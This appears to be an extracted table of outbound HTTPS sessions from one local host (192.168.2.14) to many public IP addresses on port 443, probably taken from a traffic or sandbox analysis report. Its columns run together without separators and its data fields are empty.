                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10877192.168.2.1456464140.73.130.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10878192.168.2.1444064209.61.24.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10879192.168.2.145679419.187.173.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10880192.168.2.1454822210.244.85.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10881192.168.2.143526847.210.58.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10882192.168.2.145103437.181.148.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10883192.168.2.1459586165.28.48.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10884192.168.2.144439644.101.29.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10885192.168.2.144469242.236.240.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10886192.168.2.145501644.48.127.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10887192.168.2.1450930140.47.124.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10888192.168.2.144772468.149.67.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10889192.168.2.1459666210.83.206.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10890192.168.2.1460738202.169.213.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10891192.168.2.1448476154.67.199.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10892192.168.2.1444214196.158.17.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10893192.168.2.1439300192.59.21.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10894192.168.2.1438476187.153.7.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10895192.168.2.144696014.137.96.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10896192.168.2.1457656107.72.241.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10897192.168.2.1440706201.167.142.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10898192.168.2.143421441.12.187.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10899192.168.2.1458362176.114.169.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10900192.168.2.1436648147.58.162.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10901192.168.2.1438124109.43.35.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10902192.168.2.1434144125.62.51.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10903192.168.2.144243292.155.160.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10904192.168.2.1436728109.205.195.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10905192.168.2.1446300156.236.247.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10906192.168.2.1433184188.183.175.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10907192.168.2.1436040107.126.180.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10908192.168.2.1449062143.47.101.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10909192.168.2.1436464207.82.163.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10910192.168.2.144624020.235.208.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10911192.168.2.143700082.136.78.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10912192.168.2.14472004.67.212.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10913192.168.2.1443530171.174.168.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10914192.168.2.1442200203.49.87.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10915192.168.2.144344834.152.83.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10916192.168.2.145871436.190.163.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10917192.168.2.1460618161.115.228.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10918192.168.2.145471445.172.6.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10919192.168.2.1440650204.32.29.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10920192.168.2.145965067.17.95.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10921192.168.2.1458206102.207.223.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10922192.168.2.1459952113.153.9.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10923192.168.2.143604427.19.227.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10924192.168.2.143633065.35.202.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10925192.168.2.145488646.27.243.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10926192.168.2.145669624.195.167.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10927192.168.2.1451288106.140.190.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10928192.168.2.143960612.52.134.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10929192.168.2.1450828111.47.16.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10930192.168.2.1453254117.251.159.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10931192.168.2.1459518178.165.26.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10932192.168.2.1448494197.181.234.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10933192.168.2.1450070138.127.243.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10934192.168.2.145305425.73.133.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10935192.168.2.1458838198.248.8.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10936192.168.2.143811448.60.89.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10937192.168.2.1456802208.54.65.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10938192.168.2.1437856111.230.235.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10939192.168.2.1457966208.204.73.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10940192.168.2.1440586136.85.23.20443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10941192.168.2.145438484.221.206.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10942192.168.2.1434596109.119.190.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10943192.168.2.143729617.75.84.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10944192.168.2.1460188179.38.97.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10945192.168.2.1460570183.245.100.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10946192.168.2.145990877.37.2.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10947192.168.2.145569259.143.116.137443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10948192.168.2.1453424143.235.145.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10949192.168.2.1443486139.210.58.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10950192.168.2.1453956159.82.100.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10951192.168.2.1455944170.49.183.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10952192.168.2.1457302118.198.110.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10953192.168.2.144196447.68.130.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10954192.168.2.1449730158.51.235.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10955192.168.2.1438594141.167.1.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10956192.168.2.1442358147.114.40.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10957192.168.2.143997260.159.236.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10958192.168.2.1459396202.157.36.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10959192.168.2.145648292.236.208.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10960192.168.2.1454900181.245.159.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10961192.168.2.1451268103.221.243.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10962192.168.2.143917081.248.228.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10963192.168.2.1449976115.50.78.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10964192.168.2.145267862.72.3.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10965192.168.2.1452762116.170.6.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10966192.168.2.1446206196.159.103.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10967192.168.2.145621462.93.68.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10968192.168.2.1450328187.198.161.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10969192.168.2.1457750209.29.195.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10970192.168.2.1447636110.158.223.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10971192.168.2.1446266211.16.190.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10972192.168.2.1444862168.47.134.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10973192.168.2.1454170141.50.160.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10974192.168.2.145700652.85.115.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10975192.168.2.1442434152.101.149.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10976192.168.2.144695265.0.48.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10977192.168.2.1460390185.16.192.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10978192.168.2.143900440.146.152.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10979192.168.2.145973613.187.15.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10980192.168.2.143409071.175.217.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10981192.168.2.1459392217.70.158.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10982192.168.2.1460150167.44.241.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10983192.168.2.1442446190.117.149.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10984192.168.2.1452318217.64.114.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10985192.168.2.1433092193.9.147.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10986192.168.2.1458640218.96.148.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10987192.168.2.145185441.161.199.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10988192.168.2.1436016152.103.167.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10989192.168.2.1437556169.223.151.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10990192.168.2.1453836106.169.93.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10991192.168.2.1448494159.51.69.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10992192.168.2.14366989.19.106.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10993192.168.2.1432836117.121.52.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10994192.168.2.14502321.92.246.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10995192.168.2.144642684.243.45.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10996192.168.2.1454594201.79.168.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10997192.168.2.144232868.186.222.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10998192.168.2.1452452137.72.36.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10999192.168.2.1460012131.27.253.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11000192.168.2.145845619.168.136.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11001192.168.2.1434680164.184.11.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11002192.168.2.1446408139.68.78.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11003192.168.2.1445194181.89.201.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11004192.168.2.144716832.251.10.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11005192.168.2.1456846137.61.133.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11006192.168.2.144208092.91.218.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11007192.168.2.1433318167.202.196.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11008192.168.2.1441158103.203.54.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11009192.168.2.145788414.180.193.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11010192.168.2.145977064.68.49.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11011192.168.2.143677238.44.73.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11012192.168.2.14394782.117.196.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11013192.168.2.145910689.247.109.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11014192.168.2.143581238.128.12.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11015192.168.2.143815461.116.183.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11016192.168.2.146090857.183.3.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11017192.168.2.1454246149.37.235.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11018192.168.2.1450838200.25.127.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11019192.168.2.1436564154.246.83.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11020192.168.2.1449638149.134.21.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11021192.168.2.145931084.31.204.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11022192.168.2.1445406143.135.214.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11023192.168.2.1447178198.70.69.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11024192.168.2.144190686.33.191.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11025192.168.2.1459192197.210.26.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11026192.168.2.1460756195.118.238.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11027192.168.2.145024497.211.203.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11028192.168.2.144007639.168.125.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11029192.168.2.1455804182.150.0.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11030192.168.2.1452862207.199.250.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11031192.168.2.1445870170.149.18.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11032192.168.2.1451648190.109.138.89443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11033192.168.2.1460604211.53.32.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11034192.168.2.1457220161.162.237.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11035192.168.2.144945217.135.62.228443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11036192.168.2.1433018184.233.83.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11037192.168.2.14495484.119.236.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11038192.168.2.145824688.167.47.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11039192.168.2.144701062.9.58.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11040192.168.2.1448164120.242.230.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11041192.168.2.145169091.102.247.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11042192.168.2.145662290.3.164.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11043192.168.2.1452872178.193.202.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11044192.168.2.1455654197.177.202.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11045192.168.2.1457892142.163.175.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11046192.168.2.1435758156.63.221.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11047192.168.2.1437936191.103.43.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11048192.168.2.143807258.122.92.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11049192.168.2.1457294153.87.184.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11050192.168.2.1447766173.154.225.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11051192.168.2.1442700135.20.84.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11052192.168.2.144071698.15.21.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11053192.168.2.1452104202.100.121.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11054192.168.2.1455816151.210.60.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11055192.168.2.143434047.31.187.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11056192.168.2.1433474210.191.218.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11057192.168.2.144767664.114.218.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11058192.168.2.1439682157.108.157.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11059192.168.2.1456466218.225.1.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11060192.168.2.143796878.167.239.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11061192.168.2.1453950146.17.202.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11062192.168.2.1459380105.147.66.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11063192.168.2.1450458124.20.82.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11064192.168.2.143297079.116.37.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11065192.168.2.145233844.104.206.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11066192.168.2.143491439.5.71.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11067192.168.2.144489268.195.18.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11068192.168.2.1433640185.61.252.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11069192.168.2.146071254.165.227.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11070192.168.2.1445840203.40.153.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11071192.168.2.1435122167.5.255.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11072192.168.2.145116439.216.243.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11073192.168.2.1459130172.247.241.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11074192.168.2.145909050.60.207.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11075192.168.2.143330093.25.63.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11076192.168.2.144804049.233.17.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11077192.168.2.1455680195.117.187.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11078192.168.2.1460030109.101.126.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11079192.168.2.1434696172.226.48.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11080192.168.2.1456100150.17.29.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11081192.168.2.1449234196.103.107.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11082192.168.2.1446040126.88.70.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11083192.168.2.1454630142.170.136.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11084192.168.2.1445146196.69.104.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11085192.168.2.1438076101.181.44.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11086192.168.2.146051269.199.116.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11087192.168.2.1452054222.170.92.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11088192.168.2.143280286.128.78.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11089192.168.2.1450266210.74.85.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11090192.168.2.1448466148.95.11.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11091192.168.2.1437196201.187.208.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11092192.168.2.1460892178.74.45.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11093192.168.2.1454234126.2.161.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11094192.168.2.143921258.255.198.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11095192.168.2.1441132210.143.75.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11096192.168.2.1458540117.196.255.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11097192.168.2.1448168161.225.24.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
